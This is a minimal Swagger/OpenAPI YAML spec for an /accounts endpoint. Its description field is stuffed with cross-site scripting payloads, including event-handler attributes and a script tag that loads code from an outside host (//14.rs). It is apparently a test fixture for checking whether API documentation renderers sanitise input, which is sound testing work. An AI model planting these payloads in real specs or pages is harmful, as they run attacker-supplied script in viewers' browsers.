swagger: '2.0'
info:
  title: Example yaml.spec
  description: This is an example text <details open ontoggle=confirm()> <svg onload=write()> <x oncut=alert()>x <svg onload=write()> <!--><script src=//14.rs>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
